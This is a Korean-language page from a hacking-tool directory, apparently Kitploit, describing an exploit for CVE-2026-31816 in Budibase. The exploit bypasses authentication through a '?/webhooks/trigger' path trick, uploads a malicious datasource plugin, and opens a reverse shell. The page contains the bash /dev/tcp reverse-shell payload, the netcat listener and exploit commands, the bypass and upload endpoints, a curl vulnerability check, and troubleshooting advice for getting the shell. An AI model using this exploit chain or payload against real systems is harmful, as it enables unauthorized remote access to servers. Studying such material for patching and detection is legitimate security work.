Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-31816-rshell — CVE-2026-31816을 Budibase에서 악용하여 인증을 우회하고, 악성 데이터소스 플러그인을 업로드한 후, 원격 접근을 위한 리버스 셸을 실행합니다. | Kitploit
도구/GitHubGitHub/imjdl/cve-2026-31816-rshell
ExploitationWeb Application ExploitationAuthenticationRemote Access ToolPayload Development
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

CVE-2026-31816을 Budibase에서 악용하여 인증을 우회하고, 악성 데이터소스 플러그인을 업로드한 후, 원격 접근을 위한 리버스 셸을 실행합니다.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31816 리버스 셸 익스플로잇

개요

이 도구는 CVE-2026-31816을 악용하여 대상 Budibase 서버에 리버스 셸 연결을 설정합니다.

공격 체인: 인증 우회 → DATASOURCE 플러그인 업로드 → 서버 측 코드 실행 → 리버스 셸

요구 사항

  • Python 3.6+
  • requests 라이브러리 (pip install requests)
  • CVE-2026-31816에 취약한 대상 Budibase 서버

사용 방법

기본 단계

root@kitploit:~
# 1. 공격자 머신에서 리스너 시작
nc -lvnp 4444

# 2. 익스플로잇 실행 (다른 터미널)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

매개변수

매개변수필수설명
-t, --target✅대상 Budibase URL
--lhost✅리스너 호스트 (사용자 IP)
--lport❌리스너 포트 (기본값: 4444)

예시

root@kitploit:~
# 공격자 IP: 192.168.1.100
# 대상 Budibase: 192.168.1.128:10000

# 터미널 1 - 리스너 시작
nc -lvnp 4444

# 터미널 2 - 익스플로잇 실행
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

작동 원리

1. 취약점 확인

root@kitploit:~
GET /api/integrations?/webhooks/trigger

200을 반환하면 대상이 인증 우회에 취약한 것입니다.

2. 악성 플러그인 생성

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

DATASOURCE 유형 플러그인은 서버에서 JavaScript 코드를 실행합니다.

3. 리버스 셸 페이로드

root@kitploit:~
// 플러그인 검증 시 실행:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. 업로드 및 실행

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

인증을 우회하여 플러그인을 업로드합니다. 코드는 검증 중에 실행됩니다.

공격 흐름

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  공격자     │     │   대상      │     │  리스너     │
│             │     │   서버      │     │   (nc)      │
│             │     │             │     │             │
│ 익스플로잇 ─┼────►│ 플러그인    │     │             │
│             │     │ 업로드      │     │             │
│             │     │ 코드 실행   │────►│ 리슨       │
│             │     │             │◄────┤ 리버스     │
│             │     │             │     │ 연결       │
└─────────────┘     └─────────────┘     └─────────────┘

성공 표시

root@kitploit:~
============================================================
CVE-2026-31816 - 리버스 셸 익스플로잇
============================================================
[*] 대상: http://192.168.1.128:10000
[*] 리버스 셸: 192.168.1.100:4444

[*] 취약점 확인 중...
[+] 대상이 취약합니다!
[*] 192.168.1.100:4444를 대상으로 하는 리버스 셸 플러그인 생성 중

[*] 리버스 셸 플러그인 업로드 중...
[*] 상태: 200
[+] 플러그인이 성공적으로 설치되었습니다!

============================================================
[+] 성공! 리스너를 확인하세요!
============================================================

문제 해결

Q: 연결 실패, 셸을 받지 못함

가능한 원인:

  1. 방화벽이 리버스 연결을 차단
  2. 대상 서버가 공격자 IP에 도달할 수 없음
  3. 대상 서버에 bash가 없음

해결 방법:

root@kitploit:~
# 네트워크 연결 확인
ping YOUR_IP

# 방화벽 확인
sudo ufw allow 4444/tcp

# 다른 포트 시도
nc -lvnp 8080

Q: 업로드 실패

가능한 원인:

  1. 대상이 취약점을 패치함
  2. 네트워크 문제

해결 방법:

root@kitploit:~
# 취약점 존재 여부 수동 테스트
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# JSON을 반환하면 취약점이 존재함
도구 다운로드